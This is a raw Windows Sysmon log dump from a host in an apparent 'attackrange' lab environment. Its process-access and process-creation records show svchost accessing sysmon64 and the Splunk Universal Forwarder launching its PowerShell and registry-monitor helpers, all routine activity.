Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.671{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.671{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F65F-60EB-A979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.671{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65F-60EB-A979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.671{0C1E0330-F65F-60EB-A979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000808886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.140{0C1E0330-F65E-60EB-A879-00000000D001}40763708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65E-60EB-A879-00000000D001}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F65E-60EB-A879-00000000D001}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65E-60EB-A879-00000000D001}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.985{0C1E0330-F65E-60EB-A879-00000000D001}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 